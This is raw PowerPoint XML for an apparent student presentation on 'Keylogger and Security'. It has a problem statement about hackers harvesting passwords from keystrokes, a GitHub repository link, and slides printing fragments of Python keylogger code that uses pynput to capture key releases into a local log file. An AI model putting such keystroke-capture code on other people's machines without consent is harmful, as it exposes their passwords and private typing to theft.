        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F7C8F6D-EE6F-591E-FC0B-87D41CD27175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2986289208"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533400" y="1640080"/>
          <a:ext cx="7981156" cy="48332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2000" y="12497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219200" y="1127987"/>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accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-30" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-405" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>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2" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E4CC72-D216-4C0D-A3B1-B04338A93FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2438400"/>
            <a:ext cx="7772400" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>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08AA-0CA8-5C0A-C2D1-8D3A2E752689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472127" y="685800"/>
            <a:ext cx="10018713" cy="1752599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PROJECT LINK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D520CE4-2BE2-8047-2555-2714D1AE1840}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3059668"/>
            <a:ext cx="6705600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>https://github.com/MopuriLeelaSai/Project-Keylogger.git</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17570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xfrm>
            <a:off x="911586" y="896070"/>
            <a:ext cx="5800851" cy="51816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 name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67D4CAE7-92FB-49A0-191E-7B71A5C2B67F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466725" y="3039171"/>
            <a:ext cx="9286875" cy="677108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>KEYLOGGER AND SECURITY</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="440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35385" y="416689"/>
            <a:ext cx="10018713"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8" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA1155DA-9934-0292-618F-9159E8B926DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4269074154"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="223837" y="2049815"/>
          <a:ext cx="9657556" cy="3486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75021" y="31930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86800" y="1434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75583" y="379460"/>
            <a:ext cx="1001871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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ROB</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" spc="55" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" spc="20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" spc="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" spc="-370" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" spc="-375" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" spc="-10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ME</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" spc="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NT</a:t>
            </a:r>
            <a:endParaRPr sz="4250" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC2E613-13CF-B390-7C8E-646CA04B0F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2039749"/>
            <a:ext cx="6940869" cy="2215991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>hacker then analyzes the keystrokes to locate usernames and passwords and uses them to hack into otherwise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>secure systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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4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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>To tackle this issue we are therefore using a software keylogger that can be remotely ins</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="240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5" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B9517B-408D-5892-CAB8-F64538390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4174" y="4452192"/>
            <a:ext cx="3552826" cy="15676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0" y="566771"/>
            <a:ext cx="10018713"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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PROJECT	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4250" spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OVERVIEW</a:t>
            </a:r>
            <a:endParaRPr sz="4250" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CB9494F-CB3D-99CF-97DE-18384C4FF339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1743141"/>
            <a:ext cx="7629525" cy="4480783"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>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endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0"/>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15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1D2CF31-2675-5BCC-34D8-DA2BDC8D833D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="2514600"/>
            <a:ext cx="1699407" cy="213378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2520CC89-2BCC-CDBE-D513-8EDC5D7FB8D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4865585" y="2895600"/>
            <a:ext cx="2482068" cy="172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8978584" y="5495925"/>
            <a:ext cx="295418"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259407" y="58491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906743"/>
            <a:ext cx="10681335" cy="570669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-235" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AR</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="30" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-45" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S?</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04424235-4229-535E-03E7-C5138D572D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2218663"/>
            <a:ext cx="8897368" cy="3016210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>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808089"/>
            <a:ext cx="9533466" cy="567463"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5670CA18-5EB9-40D3-8216-A7599386802B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1953412"/>
            <a:ext cx="5486400" cy="4001095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0" err="1"/>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0" err="1"/>
              <a:t>tk</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0" err="1"/>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0" err="1"/>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="3400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="3400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0" err="1"/>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" b="1"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F68C-8AB2-5381-F366-AF79105535D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755332" y="385444"/>
            <a:ext cx="10681335" cy="5232202"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, keys</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    )</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
